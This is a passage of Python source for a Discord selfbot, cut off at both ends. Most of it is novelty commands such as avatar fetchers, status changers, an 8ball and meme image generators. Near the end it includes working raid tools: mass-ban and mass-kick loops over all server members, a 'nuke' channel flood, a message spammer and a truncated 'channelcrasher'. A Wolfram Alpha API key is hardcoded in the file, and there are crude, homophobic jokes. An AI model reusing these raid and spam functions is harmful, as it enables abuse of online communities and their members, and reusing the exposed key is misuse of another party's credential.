discord.Embed(title="Exception Error:", description="You have entered an invalid ip address.", color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['pfp', 'avatar']) async def av(ctx, *, user: discord.User=None): await ctx.message.delete() commandprint("Command 'av' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "avatar @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: format = "gif" user = user or ctx.author if not user.is_avatar_animated(): format = "png" avatar = user.avatar_url_as(format = format if format != "gif" else None) async with aiohttp.ClientSession() as session: async with session.get(str(avatar)) as resp: image = await resp.read() with io.BytesIO(image) as file: await ctx.send(file = discord.File(file, f"Avatar.{format}")) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User could not be found. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['guildpfp']) async def guildicon(ctx): await ctx.message.delete() commandprint("Command 'guildicon' has been used by " + bot.user.name) try: em = discord.Embed(title=ctx.guild.name, color=color) em.set_footer(text=footer) em.set_image(url=ctx.guild.icon_url) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Command must be used within servers. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def stream(ctx, *, message = None): await ctx.message.delete() if message is None: commandprint("Command 'stream' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "stream ur mum sleeping", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: commandprint("Command 'stream' has been used by " + bot.user.name + " with a message of '" + message + "'") try: stream = discord.Streaming(name=message, url=streamurl) await bot.change_presence(activity=stream) em = discord.Embed(title=f"**STATUS CHANGED**", description="Your streaming status has been set to **'" + message + "'**", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You already have a custom status. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def watching(ctx, *, message = None): await ctx.message.delete() if message is None: commandprint("Command 'watching' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "watching flairings sleep", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'watching' has been used by " + bot.user.name + " with a message of '" + message + "'") await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=message)) em = discord.Embed(title=f"**STATUS CHANGED**", description="Your watching status has been set to **'" + message + "'**", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You already have a custom status. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['playing']) async def game(ctx, *, message = None): await ctx.message.delete() if message is None: commandprint("Command 'watching' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a game \n" "Example: " + prefix + "game 2k", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'watching' has been used by " + bot.user.name + " with a message of '" + message + "'") game = discord.Game(name=message) em = discord.Embed(title=f"**STATUS CHANGED**", description="Your playing status has been set to **'" + message + "'**", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) await bot.change_presence(activity=game) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You already have a custom status. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def listening(ctx, *, message = None): await ctx.message.delete() if message is None: commandprint("Command 'listening' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a listening \n" "Example: " + prefix + "listening flairings piss", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'listening' has been used by " + bot.user.name + " with a message of '" + message + "'") await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=message)) em = discord.Embed(title=f"**STATUS CHANGED**", description="Your listening status has been set to **'" + message + "'**", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You already have a custom status. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def ascii(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'ascii' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "ascii hello", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: r = requests.get(f'http://artii.herokuapp.com/make?text={urllib.parse.quote_plus(text)}').text if len('```'+r+'```') > 2000: errorprint("Exception ' {0} ', Message over 2000 CHARS long") em = discord.Embed(title="Exception Error:", description="Expected Exception: Message is too long \n Console Exception N/A", color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) return await ctx.send(f"```{r}```") except Exception as error: errorprint("Exception ' {0} ', Message over 2000 CHARS long".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Message over 2000 CHARS long \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(name='groupleaver', aliases=['leaveallgroups', 'leavegroup', 'leavegroups']) async def _group_leaver(ctx): await ctx.message.delete() commandprint("Command 'leaveallgroups' has been used by " + bot.user.name) try: for channel in bot.private_channels: if isinstance(channel, discord.GroupChannel): await channel.leave() except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['dong', 'penis', 'cock', 'winky', 'shlong']) async def dick(ctx, *, user: discord.User=None): await ctx.message.delete() commandprint("Command 'dick' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "dick @Flairings" "\n (its huge.)", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: if user is None: user = ctx.author size = random.randint(1, 15) dong = "" for _i in range(0, size): dong += "=" em = discord.Embed(title=f"{user}'s Dick size", description=f"8{dong}D", colour=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User could not be found".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User could not be found. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['8ball']) async def _8ball(ctx, *, question = None): await ctx.message.delete() if question is None: commandprint("Command '8ball' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "8ball am i gay?", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command '8ball' has been used by " + bot.user.name + " with a message of '" + question + "'") responses = [ 'That is a no from me', 'It is not looking likely', 'It is quite possible', 'That is a definite yes!', 'Maybe', 'There is a good chance', 'LOL NO', 'yes :)', 'oh fella, pipe down g. nah lad', ] answer = random.choice(responses) embed = discord.Embed(color=color) embed.add_field(name="Question", value=question, inline=False) embed.add_field(name="Answer", value=answer, inline=False) embed.set_thumbnail(url="https://cdn.discordapp.com/attachments/720348929043988572/722447275561058314/1200px-8-Ball_Pool.svg.png") embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def gay(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'gay' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "gay @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: format = "gif" user = user or ctx.author if not user.is_avatar_animated(): format = "png" avatar = user.avatar_url_as(format=format if format != "gif" else None) em = discord.Embed(color=color) em.set_footer(text=footer) em.set_image(url=f"https://some-random-api.ml/canvas/gay?&avatar={avatar}") await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def wasted(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'wasted' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "wasted @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: format = "gif" user = user or ctx.author if not user.is_avatar_animated(): format = "png" avatar = user.avatar_url_as(format=format if format != "gif" else None) em = discord.Embed(color=color) em.set_footer(text=footer) em.set_image(url=f"https://some-random-api.ml/canvas/wasted?&avatar={avatar}") await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def binarytotext(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'binarytotext' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "binarytotext hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: req = requests.get(f'https://some-random-api.ml/binary?decode={text}') embed = discord.Embed(title="", color=color, ) embed.add_field(name="**BINARY TO TEXT RESULT**", value=f"{req.json()['text']} \n", inline=False) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not reach api / not binary".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not reach api / not binary \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def texttobinary(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'texttobinary' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "texttobinary hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: req = requests.get(f'https://some-random-api.ml/binary?text={text}') embed = discord.Embed(title="", color=color, ) embed.add_field(name="**TEXT TO BINARY RESULT**", value=f"{req.json()['binary']} \n", inline=False) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not reach api / not binary".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not reach api / not english \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def lyricfinder(ctx, *, title = None): await ctx.message.delete() commandprint("Command 'lyricfinder' has been used by " + bot.user.name) if title is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a title \n" "Example: " + prefix + "lyricfinder number logan paul", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: req = requests.get(f'https://some-random-api.ml/lyrics?title={title}') embed = discord.Embed(title="**SONG FINDER**", description=f"{req.json()['lyrics']}", color=color, ) embed.add_field(name="**TITLE**", value=f"{req.json()['title']} \n", inline=False) embed.add_field(name="**AUTHOR**", value=f"{req.json()['author']} \n", inline=False) embed.add_field(name="**SOURCE**", value=f"{req.json()['links']} \n", inline=False) embed.set_footer(text=footer) await ctx.send("", embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Embeds have a maximum character count of 2000".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Embeds have a maximum character count of 2000 \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def tweet(ctx, username: str = None, *, message: str = None): await ctx.message.delete() commandprint("Command 'tweet' has been used by " + bot.user.name) if username is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a username \n" "Example: " + prefix + "tweet Flairings wag1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif message is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "tweet Flairings wag1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: async with aiohttp.ClientSession() as cs: async with cs.get(f"https://nekobot.xyz/api/imagegen?type=tweet&username={username}&text={message}") as r: res = await r.json() em = discord.Embed() em.set_image(url=res["message"]) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) marriedlist = "no one" @bot.command() async def marry(ctx, member: discord.User=None): await ctx.message.delete() if member is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "marry @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'marry' has been used by " + bot.user.name) global marriedlist if f"{member}" in marriedlist: embed=discord.Embed(title=f"You are already married to this person.", color=color) await ctx.send(embed=embed, delete_after=deletetimer) return embed=discord.Embed(title=f"{member} will you marry me?", description="say yes or no", color=color) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) def check(m): return m.content == "yes" or m.content == "no" and m.channel == ctx.channel msg = await bot.wait_for("message", check=check) if msg.content == "yes": embed=discord.Embed(title=f"{bot.user.name} has married {member}", color=color) await ctx.send(embed=embed, delete_after=deletetimer) marriedlist = f"{msg.author}" else: embed=discord.Embed(title=f"{member} has declined", color=color) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command() async def divorce(ctx): await ctx.message.delete() commandprint("Command 'divorce' has been used by " + bot.user.name) try: global marriedlist embed=discord.Embed(title=f"You have divorced {marriedlist}", color=color) await ctx.send(embed=embed, delete_after=deletetimer) marriedlist = "no one" except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def married(ctx): await ctx.message.delete() commandprint("Command 'married' has been used by " + bot.user.name) try: global marriedlist embed=discord.Embed(title=f"I am married to", description=f"{marriedlist}", color=color) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def reverse(ctx, *, text = None): await ctx.message.delete() if text is None: commandprint("Command 'reverse' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "reverse bruh", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) try: commandprint("Command 'reverse' has been used by " + bot.user.name + " with a message of '" + text + "'") await ctx.send(text[::-1]) except Exception as error: errorprint("Exception ' {0} ', Message is too long".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Message is too long \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['question']) async def ask(ctx, *, question = None): await ctx.message.delete() commandprint("Command 'question' has been used by " + bot.user.name) if question is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a question \n" "Example: " + prefix + "question when did hitler die", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) try: r = requests.get(f"https://api.wolframalpha.com/v1/result?appid=85PTL6-9YEK2RE4HQ&i=" + question + f"%3F").text embed = discord.Embed(title=f" __**{question}?**__ ", description=f"{r}", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Unknown".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def threats(ctx, image: str = None): await ctx.message.delete() commandprint("Command 'threats' has been used by " + bot.user.name) if image is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a image \n" "Example: " + prefix + "threats https://image.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: p = requests.get(f"https://nekobot.xyz/api/imagegen?type=threats&url={image}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid parameters".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid parameters \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def magik(ctx, image: str = None, intensity = None): await ctx.message.delete() commandprint("Command 'magik' has been used by " + bot.user.name) if image is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a image \n" "Example: " + prefix + "magik https://image.com 6", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) try: if intensity is None: p = requests.get(f"https://nekobot.xyz/api/imagegen?type=magik&intensity=10&image={image}") else: p = requests.get(f"https://nekobot.xyz/api/imagegen?type=magik&intensity={intensity}&image={image}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid parameters".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid parameters \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def changemymind(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'changemymind' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "changemymind discord shouldnt sell to microsoft", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: p = requests.get(f"https://nekobot.xyz/api/imagegen?type=changemymind&text={text}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid parameters".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid parameters \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def iphonex(ctx, url: str = None): await ctx.message.delete() commandprint("Command 'iphonex' has been used by " + bot.user.name) if url is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a image \n" "Example: " + prefix + "iphonex https://imageinnit.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: p = requests.get(f"https://nekobot.xyz/api/imagegen?type=iphonex&url={url}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid parameters".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid parameters \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def trumptweet(ctx, *, text = None): await ctx.message.delete() if text is None: commandprint("Command 'trumptweet' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "trumptweet i am declearing war against china", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'trumptweet' has been used by " + bot.user.name + " with a message of '" + text + "'") p = requests.get(f"https://nekobot.xyz/api/imagegen?type=trumptweet&text={text}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Unknown".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() @commands.has_permissions(administrator=True) async def ban(ctx, member : discord.User=None, *, reason = None): await ctx.message.delete() commandprint("Command 'ban' has been used by " + bot.user.name) if member is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a member \n" "Example: " + prefix + "ban @Flairings stupid", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif reason is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a member \n" "Example: " + prefix + "ban @Flairings stupid", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: await member.ban(reason=reason) embed=discord.Embed(title=f"**{bot.user.name} HAS BANNED {member}**", color=color) await ctx.send(embed=embed, delete_after=deletetimer) embed.set_footer(text=footer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() @commands.has_permissions(administrator=True) async def unban(ctx, member : discord.Member, *, reason): await ctx.message.delete() commandprint("Command 'unban' has been used by " + bot.user.name) if member is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a member \n" "Example: " + prefix + "unban @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: await member.unban(reason=reason) embed=discord.Embed(title=f"**UNBANNED {member}**") embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def massban(ctx): await ctx.message.delete() commandprint("Command 'massban' has been used by " + bot.user.name) try: for user in list(ctx.guild.members): try: await user.ban() except: warningprint("Could not complete 'user.ban'") except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def masskick(ctx): await ctx.message.delete() commandprint("Command 'masskick' has been used by " + bot.user.name) try: for user in list(ctx.guild.members): try: await user.kick() except: print("could not complete task user.kick") except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def massunban(ctx): await ctx.message.delete() commandprint("Command 'massunban' has been used by " + bot.user.name) try: banlist = await ctx.guild.bans() for users in banlist: try: await ctx.guild.unban(user=users.user) except: print("could not complete task guild.unban") except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(pass_context=True) async def banlist(ctx): await ctx.message.delete() commandprint("Command 'banlist' has been used by " + bot.user.name) try: bans = await ctx.guild.bans() em = discord.Embed(title=f'**LIST OF BANNED USERS ({len(bans)})**:', color=color) em.description = ', '.join([str(b.user) for b in bans]) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def nuke(ctx): await ctx.message.delete() commandprint("Command 'nuke' has been used by " + bot.user.name) try: await ctx.send("‎\n" * 500) await ctx.send("‎\n" * 500) await ctx.send("‎\n" * 500) await ctx.send("‎\n" * 500) await ctx.send("‎\n" * 500) await asyncio.sleep(2) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def spam(ctx, amount: int = None, *, text = None): await ctx.message.delete() commandprint("Command 'spam' has been used by " + bot.user.name) if amount is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a amount \n" "Example: " + prefix + "spam 5 hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "spam 5 hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: for i in range(amount): try: await ctx.send(text) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def channelcrasher(ctx): await ctx.message.delete() commandprint("Command 'channelcrasher' has been used by " + bot.user.name) try: await 